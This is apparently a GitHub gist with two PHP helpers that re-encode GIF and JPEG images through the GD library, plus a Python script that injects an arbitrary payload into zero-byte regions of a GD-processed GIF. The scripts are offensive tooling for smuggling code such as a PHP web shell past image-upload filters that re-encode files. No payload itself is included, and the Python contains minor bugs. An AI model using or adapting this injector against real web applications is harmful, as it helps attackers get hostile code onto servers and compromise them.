Skip to content

Instantly share code, notes, and snippets.

@asdqwe3124
Last active October 8, 2023 03:27
Show Gist options
  • Save asdqwe3124/e63eba35dc8e6976af97f1a9348b277b to your computer and use it in GitHub Desktop.
Save asdqwe3124/e63eba35dc8e6976af97f1a9348b277b to your computer and use it in GitHub Desktop.
<?php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
#!/usr/bin/python
#modified from https://github.com/dlegs/php-jpeg-injector/blob/master/gd-jpeg.py
import sys
import binascii
def main():
if len(sys.argv) != 4:
print("USAGE: <gd-gif> <payload> <output_name>")
sys.exit()
gif = sys.argv[1]
payload = sys.argv[2]
output = sys.argv[3]
payload_len = len(payload)
loc = get_loc(gif, payload_len)
inject_payload(gif, loc, payload, output)
def get_loc(gif,payload_len):
empty_space = payload_len*'00'
print("Searching for %s bytes empty space") % (payload_len)
f = open(gif, 'rb')
contents = f.read()
loc = contents.find(binascii.unhexlify(empty_space))
f.close()
if loc != -1:
print("Found empty space.")
return loc
else:
print("Can't found enough empty space, try other .gif image. Exiting.")
sys.exit()
def inject_payload(gif, loc, payload, output):
bin_payload = bin(int(binascii.hexlify(payload),16))
f = open(gif, 'rb')
fo = open(output, 'wb')
print("Injecting payload...")
contents = f.read()
pre_payload = contents[:loc]
post_payload = contents[loc + len(payload):]
fo.write(pre_payload + payload + post_payload + '\n')
print("Payload written.")
f.close()
fo.close()
if __name__ == "__main__":
main()
<?php
//php gd.php image.jpg gd-image.jpg 0-100[optional]
(isset($argv[3]) ? $q = $argv[3] : $q = -1);
$jpg = imagecreatefromjpeg($argv[1]);
//imagejpeg ( resource $image [, mixed $to = NULL [, int $quality = -1 ]] ) : bool
imagejpeg($jpg, $argv[2], $q);
imagedestroy($jpg);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment